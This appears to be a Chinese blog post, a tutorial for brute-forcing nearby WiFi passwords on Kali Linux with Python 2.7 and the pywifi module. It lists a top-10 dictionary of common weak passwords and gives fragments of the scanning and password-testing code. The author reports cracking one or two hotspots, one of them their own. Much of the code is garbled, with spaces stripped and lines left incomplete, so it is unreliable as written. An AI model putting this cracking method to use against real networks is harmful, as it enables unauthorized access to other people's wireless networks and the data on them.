一点号电子物证昨天
python2.7
凑合的linux
差不多的无线网卡
pywifi模块
弱口令字典
清除系统中的任何wifi连接记录(非常重要!!!)
首先,这个模块在win下有点鸡肋,作者在调用WLANAPI时没有做好WLAN_SECURITY_ATTRIBUTES的封装,所以推荐在linux下跑,我测试所使用的是Kali 2.0 自带python 2.7.6 ,可直接通过 pip install pywifi 安装。
导入模块
这里用的模块就这三个 pywifi的_wifiutil_linux.py脚本的 _send_cmd_to_wpas方法中的if reply != b'OK\n':判断需要修改,不然会有很多的提示信息。
frompywifiimport*importtime
importsys 字典准备
效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的wifi弱口令TOP10
12345678
123456789
88888888
1234567890
00000000
87654321
66668888
11223344
147258369
11111111
配置扫描器推荐扫描时常可以设置在15-20秒之间 测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义 到时候就算破解成功的热点,信号也好不到哪里
print"%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*706
"WIFIID"18"SSID OR BSSID"2"N"4"time"7"signal"10"KEYNUM"10
"KEY""="*70) #将每一个热点信息逐一进行测试 fori,xinenumerate(scanres):
#测试完毕后,成功的结果讲存储到files中 res = test(nums-i,iface,x,keys,output,testtimes)
ifres: open(files,"a").write(res)
扫描周围热点
defscans(face,timeout): #开始扫描 face.scan time.sleep(timeout)#在若干秒后获取扫描结果 returnface.scan_results 热点测试
这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。
stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6,i,18,showID,code,5,now,
7,x.signal,10,len(key)-n,10,k.replace("\n""")))
stu.flushifcode ==4:
face.disconnectreturn"%-*s| %s | %*s |%*s\n"%(20,x.ssid,x.bssid,3,x.signal,15,k)
returnFalse
案例
这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了
WIFIID热点的id号 每跑一个会减1
SSID OR BSSID热点的ssid名或mac地址
N对热点的连接状态,这个在
time当前所花去的时间
signal热点的信号强度,若小越好
KEYNUM测试密码的id 每跑一个会减1
KEY当前测试的密码
结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 - -
http://mp.weixin.qq.com/s?__biz=MzA4ODUxNjIwMg==&mid=2654324244&idx=2&sn=802236b9e0934d70a246b9eaa5058a23&chksm=8be99511bc9e1c073add9422436993ae1e3043b9e5341b8118504400bddec30be7be4741921f&scene=0#rd